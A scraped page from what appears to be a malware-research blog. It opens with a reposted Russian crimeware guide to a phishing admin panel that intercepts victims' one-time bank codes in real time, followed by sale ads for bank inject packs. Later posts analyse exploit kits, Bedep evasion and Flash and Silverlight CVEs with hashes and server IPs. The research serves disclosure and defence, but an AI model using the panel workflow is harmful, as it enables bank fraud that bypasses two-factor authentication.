пароль(tooken) на протяжении 30 секунд пока жертва ждет загрузки следующей страницы. Возьмем тот же PayPal. Скажем вы получили только что username и пароль, зашли внутрь, и на главной странице вам выскочила рамочка гдеговорится что для подтверждения вашей личности на ваш мобильный телефон был отправлен SMS с коротким кодом(Tooken) код который надо вести тam же в рамочкe.Код который был отправлен на мобильный телефон жертвы!!! жертва которая на данный момент находится на вашей странице(Phishing Inject)!!!там где только что она(жертва) ввела username и пароль, username и пароль те что пришли к вам на админку и те что вы использовали для тогочтобы зайти на тот самый аккаунт где вам выскочила рамочка!! В стандартных методах это называется запал и етот пакет информации можно выбросить. можно сделать такую же рамочку после логин этападля всех юзеров на нашей пишем фишинг или инжекте, но проблема в том что это рамочка показывается не всем и не всегда и если жертвена телефон ничего не приходило то он туда ничего никогда не ведет.Я думаю всем понятно что здесь нужна динамическая страница с дистанционным управлением. То есть вы должны принимать решения показыватьрамочку данной жертве или не показывать.Именно это и есть основа.Страница которая присоединена к нашей админке может меняться исходя из команд которые вы задаете в админке.Команд может быть много, но для этого в определенном месте в админке для каждой жертвы eсть список команд, которые можнозадать для данной страницы на которой он(жертвa) находится.[1 image here...not available at dump time]в нашем примитивном пример из PayPal в списке операции должнa присутствовать кнопка "показать рамочку".Если вы зашли на аккаунт с только что полученными данными и у вас выкидывает эту рамочку вы нажимаете кнопку "показать рамочку" для данной жертвой.И у нее на экране покажет такую же рамочку.Tooken, который будет введён в эту рамочку прилетит к вам на админ туда же где лежат username и пароль от этой жертвы.Думаю здесь все понятно.Единственное что хотел бы подчеркнуть то что жертва в любой момент может закрыть страницу закрыть компьютер вырубить сеть.В таком случае связь страницы с админкой теряется и задавать команды для данной страницы не имеет смысла.Для этого в нашей админке есть Tracker онлайн статуса который позволяет нам следить находится ли жертва онлайн или нет. [1 image here...not available at dump time]Теперь структура Tooken intercept админки.Первая страница это главная страница где показана текучка всех посетителей(жертв) ваших инжектов и фишингов.Напротив каждого посетителя есть кнопка O-Panel при нажатии на которую вы попадаете уже на индивидуальную панель операций для данного посетителя.[1 image here...not available at dump time] Именно здесь и находится список операций.Именно здесь крупным планом видно онлайн статус. Прошу заметить что онлайн статусов бывает 3(ONLINE, OFFLINE и WAITING).WAITING статус светится красным и светится только тогда когда жертва ждет операции от вас ,то есть только что вам был отправленпакет информации и страница ждет дальнейших инструкций!.[1 image here...not available at dump time]Также жертва с этим статусом мигает красным и на главной странице что поднимает их в таблице вверх. Окей давайте теперь возьмем реальный пример Phishing страницы скажем одного из нидерландских банков. тут реализованные как PCтак и мобильная версия.[1 image here...not available at dump time]Вы делаете рассылку на email и линки могут открываться на мобильном. в основном 50% так и происходит.Скажем кто-то(жертвa) переходит на Линк в вашем email и попадает на нашу страницу. Вы об этом узнаете сразу через Jabber Alert,в котором будет говориться про нового посетителя.Самое время открыть Universal панель. там вы увидите Новую колонку с информацией про посетителя а Конкретно его айпи ширина экрана и многое другое[1 image here...not available at dump time]с минуты на минуту к нам прилетят логины, их можно ждать как на главной так и на O-Panel.после того как Вы получили логины, Посетитель уходит в режим ожидания. об этом Вам будут говорить красные мигающие панели, она экранe у жертвы будет примерно такое[1 image here...not available at dump time]Что делать вам с полученным пакетом Логинов Решать только Вам. Но если у вас, находясь внутри в аккаунте, попросят ввести tooken, пароль, SMS пароль то самое время вернуться на O-Panel и нажать соответствующую команду. Команда которая приведет к тому что страница на которой находится жертва покажет ему запрос того что вам надо.[1 image here...not available at dump time]После того как жертва ввела в форму Tooken ,она снова уходит в режим ожидания, и Вы снова должны определиться что делать и какую команду ему дать. И так до бесконечности или пока жертва не Закроет страницу. Но если все-таки это надоест вам то у васесть два варианта распрощаться жертвой. это поставить блок [1 image here...not available at dump time]или перенаправить его на оригинал страницу.[1 image here...not available at dump time]При работе с одним посетителем могут стучать другие новые.Это будет отвлекать и все новые посетители будут ждать. чтобы этого избежать на главной странице есть ричашки которые контролируютрегистрацию новых посетителей и переадресацию старых поголовно. Если поставить регистрацию OFF ,то в админке только будут работать Те кто уже Там есть, все новые будут попадать на оригинал страницы контор.A если поставить редирект всех ,то все посетители(жертвы) кто есть в админке будут перенаправлены на свои оригинальные страницы поголовно.Это надо делать когда вы собрались к примеру уходить.------------------------------------------On april 2016 the 4th:------------------------------------------увжаемые друзьяновые инжекты под Андроид------------------------------------------On april 2016 the 11th:------------------------------------------Продается Пак инжектов под андроид для сбора карт.WhatsUpFacebookInstagramViberSkaypGooglePlayPrice:450$user posted imageОбезательно посмотрите видео. В инжектах реализованы Responsive & animations приемы.[Redacted]pass:1qaz------------------------------------------File mirrored here (pass : 1qaz)On april 2016 the 12th:------------------------------------------Pack of Injects for Columbia banks for sale.Credit cards colectors with admin panel on https domen.bancofalabellarbmcolombiacolpatriabancolombiabbvanetbancodeoccidentebancodebogotabancopichinchaPrice:800$[3 images here...not available at dump time]Video: [Redacted]Pass:columbia ------------------------------------------File mirrored here  (pass: columbia)On april 2016 the 14th:------------------------------------------Pack of Injects for Canada banks for sale.Credit cards colectors with admin panel on https domen.TdCibcBmoDesjRbcPrice:500$[3 images here...not available at dump time]Video: [Redacted]Pass:canada ------------------------------------------File mirrored here (pass: canada)On april 2016 the 18th:------------------------------------------Недавно вышел апдейт на U-admin(Universal Admin).Теперь все более соответствует написанному выше описанием.Админ панель теперь имеют специальную директорию под plugins, и все плагины в этой директории автоматически прописывается в админке.[1 image here...not available at dump time]Например, вы приобрели U-admin а потом "Log parser Plugin". Для этого вам просто надо поставить папку Log parser в плагин директорию в админке.Также был разработан VNC плагин который дает возможность коннектится к вашему botnet API с запросом на соединение по VNC/SOCKS для определенного бота.Этот плагин является дополнением к "Tooken Intercept" плагина про который я писал вам выше. Если вы используете "Tooken Intercept" с инжектороми в вашем боте есть в VNC, и в админке вашего Бота есть API управление VNC то при наличии VLC plugin в U-admin возможно сделать запрос на соединение по vnc или socks с ботом.Как правило это делается автоматически при самом первом соединение с инжектоm,то есть когда жертва заходит на страницу перехвата.В связи с этим была слегка переделана O-Panel где в команды была добавлена новая опция проверки статуса VNC/SOCKS соединение.[1 image here...not available at dump time]Куда ,как вы видите, при успешном соединении выводятся данные на VNC/SOCKS------------------------------------------File Tree from some components :Folder PATH listingUADMIN_|   cp.php|   head.php|   index.php|   login.php|   session.php|  +---files|   |   animate.css|   |   bootbox.min.js|   |   bootstrap-notify.min.js|   |   bootstrap-social.css|   |   hover-min.css|   |   index.php|   |   jquery-ui.css|   |   jquery-ui.min.js|   |   jquery.js|   |   my.css|   |  |   +---bootstrap|   |   +---css|   |   |       bootstrap-theme.css|   |   |       bootstrap-theme.css.map|   |   |       bootstrap-theme.min.css|   |   |       bootstrap-theme.min.css.map|   |   |       bootstrap.css|   |   |       bootstrap.css.map|   |   |       bootstrap.min.css|   |   |       bootstrap.min.css.map|   |   |      |   |   +---fonts|   |   |       glyphicons-halflings-regular.eot|   |   |       glyphicons-halflings-regular.svg|   |   |       glyphicons-halflings-regular.ttf|   |   |       glyphicons-halflings-regular.woff|   |   |       glyphicons-halflings-regular.woff2|   |   |      |   |   +---js|   |   |       bootstrap.js|   |   |       bootstrap.min.js|   |   |       npm.js|   |   |      |   |   \---switch|   |           bootstrap-switch.min.css|   |           bootstrap-switch.min.js|   |          |   +---dt|   |       dataTables.bootstrap.min.css|   |       dataTables.bootstrap.min.js|   |       jquery.dataTables.min.js|   |      |   \---images|           ui-icons_444444_256x240.png|           ui-icons_555555_256x240.png|           ui-icons_777620_256x240.png|           ui-icons_777777_256x240.png|           ui-icons_cc0000_256x240.png|           ui-icons_ffffff_256x240.png|          +---opt|       geo_switch.txt|       index.php|       theme.txt|      +---plugins|   +---intercept|   |   |   bc.php|   |   |   class.jabber.php|   |   |   dynamic__part.php|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |   panel.php|   |   |   text.php|   |   |  |   |   +---ajax|   |   |       cp_ajax.php|   |   |       index.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   index.php|   |   |   |   jquery-ui.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   +---dt|   |   |   |       dataTables.bootstrap.min.css|   |   |   |       dataTables.bootstrap.min.js|   |   |   |       jquery.dataTables.min.js|   |   |   |      |   |   |   \---images|   |   |           ui-icons_444444_256x240.png|   |   |           ui-icons_555555_256x240.png|   |   |           ui-icons_777620_256x240.png|   |   |           ui-icons_777777_256x240.png|   |   |           ui-icons_cc0000_256x240.png|   |   |           ui-icons_ffffff_256x240.png|   |   |          |   |   \---public|   |           .ht.db|   |           index.php|   |           Removed.txt|   |          |   +---log_parser|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   +---ajax|   |   |       server_side.php|   |   |       ssp.class.php|   |   |      |   |   +---classes|   |   |       browser.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   \---dt|   |   |           dataTables.bootstrap.min.css|   |   |           dataTables.bootstrap.min.js|   |   |           jquery.dataTables.min.js|   |   |          |   |   \---public|   |           .htBd.db|   |           geo_switch.txt|   |           index.php|   |           theme.txt|   |          |   +---settings|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           cfg.php|   |           index.php|   |          |   +---style|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           index.php|   |          |   \---text|       |   functions.php|       |   main.php|       |   text.php|       |  |       \---public|               index.php|               texts.txt|              \---scrNote: If you are interested by the [Redacted] part please send a mail

Simulacra & Simulation - Jean BaudrillardFeatured in MatrixBedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It's intimate to Angler EK and appeared around August 2014. On the 2016-03-24 I noticed several move in Bedep. Angler infecting a VM and integrating it into an instance of Bedep botnet2016-03-24No more variable in the URI (as several month before), the protocol Key changed and in most of my manual checks, all threads were sending a strange payload in the first stream.2ko size for Win7 64bits :80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9aPopup shown by the first payload from Bedep Stream - Win7(in the background Angler Landing)48ko size for WinXP 32bits:a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780Popup shown by the first payload from Bedep Stream - WinXPLooking at my traffic I thought for some time that one of the Bedep instances was split in two.Then I understood that I got different result on my "manually" driven VM (on VMWare ESXi) and my automated Cuckoo driven one ( on VirtualBox). I suspected it was related to hardening, as this is one of the main difference between those two systems.And I got confirmation. Here is an example on a GooNky ([1] [2] [3]) malvertising traffic in Australia :A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that i will refer as :Bedep "Robot Town" - 2016-04-12Now look what i get instead with a VM that is not spotted as is:Same Angler thread - VM not detected. 1st Stream get Vawtrak2016-04-12( Vawtrak in that stream   d24674f2f9879ee9cec3eeb49185d4ea6bf555d150b4e840407051192eda1d61 )I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them spotted by Cuckoo :Bedep doing some ACPI checksI think there are multiple level of checks. Some resulting in Bedep not trying to contact the C&C, some where the positive check end up with a different seed for the Bedep DGA redirecting spotted machines in a dedicated instance. This is quite powerful :- the checks are made without dropping an executable. - if you don't know what to expect it's quite difficult to figure out that you have been trapped- there is a lot of things that operators can do with this list of known bots and initial Bedep thread ID. One of them is for instance knowing which of the infection path are researcher/bots "highway" :Illustration for Bedep "Robot Town" from an "infection path" focused point of viewThis could be just a move to perform different tasks (AdFraud only (?) ) on VMs, but my guess it that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint Blog from 2016-03-18 which  show how Bedep threads are additional connectable dots. Sharing publicly is often a difficult decision. The question is which side will benefits the most from it, in the long time.For researchers:In the last 3 weeks, if your VM have communicated with :95.211.205.228 (which is a Bedep ip from end of 2015 reused) || ( 85.25.41.95  && http.uri.path  "ads.php?sid=1901" ) and you are interested by the "real payload" then you might want to give PAfish a run.Marvin - Paranoid AndroidOn the other hand, any of your VM which has communicated with 104.193.252.245 (Bedep "standard" 18xx 19xx instance)  since the 24 of March is hardened enough to grab the real payload.[Edits]- Removed the AU focused mention on the Vawtrak. I have been told (Thanks ! ) it's US focused. Got geo Glitched. Maybe more about that a day or the other.- Refine the check conditions for Researcher. IP  85.25.41.95 and sid=1901...otherwise...ok :)[/Edits]Acknowledgements :Thanks Will Metcalf and Malc0de for the discussions and help on this topic--I'm sorry, but I must do it...Greetings to Angler and Bedep guys. 😉 You are keeping us busy...and awake !Reading :Video Malvertising Bringing New Risks to High-Profile Sites - 2016-03-18 - ProofpointBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - ArborSertAngler EK : now capable of "fileless" infection (memory malware) - 2014-08-30Modifying VirtualBox settings for malware analysis - 2012-08-23  - Mikael Keri

Spotted in a "degraded" version on the 2016-04-02 in Magnitude, live also since 2016-03-31 in Nuclear Pack, Adobe was really fast at fixing  this vulnerability with the patch released on the 2016-04-07 bringing Flash Player to version 21.0.0.213It's not the first time a "0day" exploit is being used in a "degraded" state.This happened before with Angler and CVE-2015-0310 and CVE-2014-8439You'll find more details about the finding on that Proofpoint blog here :"Killing a zero-day in the egg: Adobe CVE-2016-1019"and on that FireEye blog here:CVE-2016-1019: A new flash exploit included in Magnitude Exploit KitNote : we worked with Eset, Kaspersky and Microsoft as well on this case.Nuclear Pack :2016-03-31 "Degraded"Identification by  Eset, Kaspersky and FireEye (Thanks)Exploit sent to Flash Player 20.0.0.306 by Nuclear Pack on the 2016-03-31CVE-2016-1019 insideSample in that pass:  301f163644a525155d5e8fe643b07dceac19014620a362d6db4dded65d9cad90Out of topic example of payload dropped that day by that instance of Nuclear : 42904b23cff35cc3b87045f21f82ba8b (locky)Note the string "CVE-2016-1001" in the Nuclear Pack, explaining why maybe this exploit is being used in a degraded state.CVE-2016-1001 string spotted by Denis O'Brien (Malwageddon), the 2016-04-05 in Nuclear Pack exploitMagnitude :2016-04-02 "Degraded" to 20.0.0.306Identified as is by FireEye[2016-04-07: TrendMicro told me they found some hits for this exploit in Magnitude back from 2016-03-31 as well]Magnitude exploiting Flash 20.0.0.306 with CVE-2016-1019 the 2016-04-02 in the morning.Payload is Cerber.Side note : the check on the redirector in front of Magnitude ( http://pastebin.com/raw/gfEz25fa ) which might have been fixed with the CVE-2015-2413 was in Magnitude landing itself from September to end of November 2015.res:// onload check features unobfuscated at that time in Magnitude Landing 2015-09-29Sample in that pass: 0a664526d00493d711ee93662a693eb724ffece3cd68c85df75e1b6757febde5Out of topic payload: 9d92fb315830ba69162bb7c39c45b219cb8399dd4e2ca00a1e21a5457f92fb3c Cerber RansomwareNote: I got successful pass with Windows 8.1 and Flash 20.0.0.272 as well and Windows 10 build 1511 (feb 2016) via Flash 20.0.0.306 on Internet Explorer 11. Edge seems not being served a landing.Neutrino:2016-04-11 - "degraded" as well it seems. (at least didn't got it to work on Flash 21.x)CVE id by @binjo and Anton Ivanov (Kaspersky)Neutrino successfully exploit Flash 20.0.0.306 with CVE-2016-10192016-04-11Fiddler : Sent to vtOut of topic payload: 83de3f72cc44215539a23d1408c140ae325b05f77f2528dbad375e975c18b82e Reading :Killing a zero day in the egg : CVE-2016-1019 - 2016-04-07 - ProofpointCVE-2016-1019: A new flash exploit included in Magnitude Exploit Kit - 2016-04-07 -  Genwei Jiang - FireEyeZero-Day Attack Discovered in Magnitude Exploit Kit Targeting CVE-2016-1019 in Older Versions of Adobe Flash Player - 2016-04-07 - Peter Pi, Brooks Li and Joseph C. Chen - TrendMicro

Two weeks after Flash patch,  two months after last Flash exploit integration in Angler, on the 2016-03-25 Angler EK, in some threads, is starting to send an exploit to Flash Player 20.0.0.270 and 20.0.0.306I tried multiple configuration but I was not able to get exploited. The following day I got successful infections with Flash 20.0.0.270 and 20.0.0.306.Angler EK :2016-03-25The CVE here has been identificated as CVE-2016-1001 by Eset and Kaspersky (Thanks)2016-03-26 - Angler EK successfully exploiting Flash 20.0.0.306 in Internet Explorer 11 on Windows 7Fiddler sent to VT here.Hash of the associated SWF fwiw : b609ece7b9f4977bed792421b33b15daObserved as well : ab24d05f731caa4c87055af050f26917 - c4c59f454e53f1e45858e95e25f64d07NB : this is just "one" pass.  Angler EK can be used to spread whatever its customers want to spread .Selected examples I saw in the last 4 days : Teslacrypt (ID 20, 40,52, 74 ,47) , Locky (affid 14 - 7f2b678398a93cac285312354ce7d2b7  and affid 11 - f417b107339b79a49e4e63e116e84a32), GootKit b9bec4a5811c6aff6001efa357f1f99c, Vawtrak  0dc4d5370bc4b0c8333b9512d686946cRamnit 99f21ba5b02b3085c683ea831d79dc79Gozi ISFB (DGA nasa) 11d515c2a2135ca00398b88eebbf9299BandarChor, (several instances, ex f97395004053aa28cadc6d4dc7fc0464 - 3c9b5868b4121a2d48b980a81dda8569 )Graybird/LatentBot f985b38f5e8bd1dfb3767cfea89ca776Dridex - b0f34f62f49b9c40e2558c1fa17523b5 (this one was 10 days ago..but worth a mention)Andromeda (several instances)and obviously many Bedep threads and their stream of PE (evotob, reactorbot (several instances), Tofsee, Teslacrypt,Kovter, Miuref)Edit 1: 2016-03-29 -  I was mentioning 2016-1010 as a candidate but it's not. Modified with the correct CVE ID provided by Eset and Kaspersky..

Fixed with the January 2016 Microsoft patches, CVE-2016-0034  ( MS16-006 ) is a Silverlight Memory Corruption vulnerability and it has been spotted by Kaspersky with rules to hunt Vitaliy Toropov’s unknown Silverlight exploit mentioned in HackingTeam leak.Angler EK :On the 2016-02-18 the landing of Angler changed slightly to integrate this piece of code :Silverlight integration Snipet from Angler Landing after decoding2016-02-18resulting in a new call if silverlight is installed on the computer:Angler EK replying without body to silverlight callHere a Pass in great britain dropping Vawtrak via Bedep buildid 77862016-02-18I tried all instances i could find and the same behavior occured on all.2016-02-22 Here we go : call are not empty anymore.Angler EK dropping  Teslacrypt via silverlight  5.1.41105.0 after the "EITest" redirect 2016-02-22I made a pass with Silverlight : 5.1.41212.0 : safe.Edit1 : I received confirmation that it's indeed CVE-2016-0034 from multiple analyst including Anton Ivanov (Kaspersky). Thanks !Xap file : 01ce22f87227f869b7978dc5fe625e16Dll : 22a9f342eb367ea9b00508adb738d858Out of topic payload : 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)Fiddler sent hereRIG : 2016-03-29Malc0de spotted modification in the Rig landing indicating integration of Silverlight Exploit.Here is a pass where the Silverlight is being fired and successfully exploited. CVE identification by : Anton Ivanov (Kaspersky)RIG - CVE-2016-0034 - 2016-03-29Xap file in that pass :  acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6bcontaining this dll : e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415( Out of topic payload : Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80 )Files : Fiddler and sample (password is malware)Reading :The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - KasperskyPost Publication Reading:(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

Lately I received multiple questions about connection between Reveton and Cryptowall.I decided to have a look.A search in ET Intelligence portal at domains from Yonathan's Cryptowall TrackerET Intelligence search on Specspa .comshow that the first sample ET has talking with it is :e2f4bb542ea47e8928be877bb442df1b  2013-10-20A look at the http connexion shows the "us.bin" call mentioned by Yonathan (btw the us.bin item is still live there)ET Intelligence  : e2f4bb542ea47e8928be877bb442df1b http connexionsET Intelligence : Associated alert pointing at Cryptowall.A look into VirusTotal Intelligence shows that this sample is available in a Pcap captured and shared by ThreatGlass :NSFW://www.threatglass .com/malicious_urls/sunporno-comHiman EK dropping Cryptowall 2013-10-20captured by ThreatGlassWith the same referer and in the same Exploit Kit i got dropped 20 days earlier Flimrans :(See : http://malware.dontneedcoffee.com/2013/10/HiMan.html )Flimrans disappeared soon after this post from 2013-10-08 about the affiliate :http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.htmlInterestingly Flimrans is showing in US the same Design from Reveton pointed by Yonathan :Flimrans US 2013-10-03What is worth mentioning is that Flimrans was the only ransomware (i am aware of) to show a Spanish version of this same design :Flimrans ES 2013-10-03The timeline is also inline with a link between those two Ransomware (whereas Reveton was still being distributed months after these events).Digging into my notes/fiddlers i even found that this bworldonline .com which is still hosting the us.bin was in fact also the redirector to HiMan dropping Flimrans 20 days earlier from same sunporno upper.[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]The compromised server storing the first design Blob used by cryptowallused to redirect 20 days earlier to Himan dropping Flimrans (which is using that same design).So...Cryptowall son of Borracho? I don't know for sure...but that could to be a possibility.Files : Items mentionned here. (password is malware)Read More:HiMan Exploit Kit. Say Hi to one more - 2013-10-02Flimrans Affiliate : Borracho - 2013-10-08

While other exploit kit are struggling to keep up with Angler (none is firing CVE-2015-8446 , maybe because of the Diffie-Hellman protection on Angler's exploits ),- Nuclear / Magnitude and Neutrino last exploits are from October (CVE-2015-7645)- RIG and Sundown are relying on July exploits (Hacking Team's one - CVE-2015-5122)( all have the IE CVE-2015-2419 from august)Angler has just integrated CVE-2015-8651 patched with Flash 20.0.0.270 on 2015-12-28Angler EK : 2016-01-25The exploit might be here since the 22 based on some headers modification which appeared that day.It's not yet pushed in all Angler EK threads but widely spread.Thanks Anton Ivanov (Kaspersky) for CVE Identification !CVE-2015-8651 (and CVE-2015-2419) being successfully exploited by Angler EK to load bedep in memory2016-01-25Fiddler sent to VT.---Another pass via the "noisy" Cryptowall "crypt13x" actor which threads also has it :CVE-2015-8651 being successfully exploited by Angler EK to load Cryptowall  (crypt13001)from the widely spread and covered "crypt13x" actor thread - 2016-01-25(Out of Topic payload : 5866906a303b387b9918a8d7f8b08a51 Cryptowall crypt13001 )I have been told by Eset that the exploit is successful on Flash 20.0.0.235 and Firefox.---I spotted a thread serving a landing and an exploit to Firefox.2016-03-23 Firefox pass with Sandbox escape :Angler EK exploiting CVE-2015-8651 on Firefox 33.1.1 and Flash 20.0.0.305Bedep successfully wrote its payload on the drive.2016-03-23Files : Fiddler in a zip (password malware)Neutrino :Thanks Eset for identifying the added CVE here.Neutrino Exploiting CVE-2015-8651 on 2016-02-09Here Bunitu droppedNote: For some reason couldn't have it working with Flash 20.0.0.228.Files : Fiddler here (password is malware)Nuclear Pack:Thanks again Eset for CVE identification here.Nuclear Pack exploit CVE-2015-8651 on 2016-02-10Out of topic payload: cdb0447019fecad3a949dd248d7ae30f which is a loader for CloudScout (topflix .info - which we can find in RIG as well those days)It seems Chrome won't save you if you do let it update.2016-02-17 on DE/US/FR trafficThis is not something i can reproduce.Is what i get with Chrome 46.0.2490.71 and its builtin 19.0.0.207 (which should fast update itself to last version)Files : Fiddler here (password: malware)Magnitude:2016-02-18CVE ID confirmed by Anton Ivanov (Kaspersky)Magnitude dropping Cryptowall via CVE-2015-86512016-02-18Files : Fiddler here (Password is malware)RIG :Some days before 2016-04-06Thanks FireEye for CVE identification.CVE-2015-8651 successfuly exploited by RIG on 2016-04-07Sample in that pass: 4888cc96a390e2970015c9c1d0206011a6fd8e452063863e5e054b3776deae02( Out of topic payload: 30cb7ed7a67eb08fa2845990b7270d64d51e769d6e0dad4f9c2b8e7551bced0a Probably Godzilla downloader)Files : RIG_2016-04-07 (swf, payload and Fiddler - password is malware)Read More:(GoogleTranslate - via @eromang ) Offshore "Dark Hotel" organization of domestic business executives launched APT attacks - 2015-12-31 - ThreatBookPost publication reading :An Analysis on the Principle of CVE-2015-8651 - Antiy Labs - 2016-01-26

Snipshot of MonterAV AffiliateAs I got many questions about an EK named XXX (that is said to be better than Angler 😉 ) I decided to share some data here.XXX Control Panel Login Page.XXX is Angler EK ( it's the real name of its most documented instance at least)Angler EK / XXX  IE sploit only Stats on 2015-07-25(for some reason Flash Exploits were not activated on that thread)Note the Chase Logo >> JPMorgan  >>  Cool EK's Exploit Buyer ;)You might want to read "The Transition - "Reveton Team" or "Mr.J/Monster AV" from :Paunch's arrest...The end of an Era ! (2013-10-11) . This is where I first wrote the defense chosen name for this Exploit Kit. The name is chosen after a logo from the Reveton Affiliate.Snipshot of "The Transition" after Paunch's ArrestBut Angler was around before the Reveton team started to use it.Here is one used against Ukrainian that i captured  in August 20132013-08-27 - Exploit Kit unknown to me at that timeAncestor of Angler EK as we know it[Payload here is most probably Lurk]when Reveton Team was still on Cool EK. It appears that instance had already Fileless capabilities.A Russian researcher friend connect that instance back to this Securelist post from 2012-03-16 : A unique ‘bodiless’ bot attacks news site visitorsSo the (c) 2010 at the bottom of the control panel is probably...the real birth year of Angler.This indexm.html variant of Angler EK is most probably still being used in RU/UA and was one of the early adopter of CVE-2015-0311 (a flash 0day from January) before many "standard" instances of Angler. There was still java exploit inside in march2015-01-27 - Angler EK "indexm" exploiting CVE-2015-2551 and firing Java exploits[Payload here is most probably Lurk]Angler EK has been briefly mentioned (translation here ) as part of a "partnerka" by a user using Menatep as Nickname in February 2014Conclusion : xxx is what we call Angler EK and Angler EK (indexm instance) is not that young!Files : 2 Fiddler pass of Angler EK "indexm" from 2013 and 2015 (Password : malware)Read More :Police Locker land on Android Devices - 2014-05-04Paunch's arrest...The end of an Era ! - 2013-10-11Crimeware Author Funds Exploit Buying Spree - 2013-01-07 - KrebsOnSecurityCool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop - 2012-10-09A unique ‘bodiless’ bot attacks news site visitors - 2012-03-16 - Sergey Golovanov - SecurelistPost publication Reading :Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC News [Cf Lurk]Is it the End of Angler ? - 2016-06-11How we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

One week after patch Flash 19.0.0.245 is being exploited by Angler EK via CVE-2015-8446Angler EK :2015-12-14CVE identification by Anton Ivanov ( Kaspersky ) and FireEye  (Thanks !)Angler EK exploiting Flash 19.0.0.245 via CVE-2015-84462015-12-14Sample in that pass : b5920eef8a3e193e0fc492c603a30aafSample from other Angler EK instance : 0615fb9e037b7bf717cc9b04708e51da 720089b93a0f2bb2a72f1166430de522Fiddler sent to VT.(Not replayable. You know how to contact me to land on live instances. I might not reply to mail coming from gmail,live,yahoo etc...  mailboxes)Out of topic : in that pass Bedep BuildID 5004 is loaded in Memory and is then grabbing those 2 dll in a streamf5c1a676166fe3472e6c993faee42b34d65f155381d26f8ddfa304c83b1ad95a (Credential Stealer)and after that performing AdfraudCVE-2015-8446 in Angler EK - malicious mp3 is stored in encrypted JSON (same schema as in CVE-2015-5560). pic.twitter.com/FCyvP43Q0X— Anton Ivanov (@antonivanovm) December 17, 2015 Last safe version of Flash against commercial exploit kit  was 19.0.0.226 fixing CVE-2015-7645Post publication readings :(Google Translate) Angler EK latest CVE-2015-8446 Flash Exploit analysis - 2015-12-19 - Qihoo360

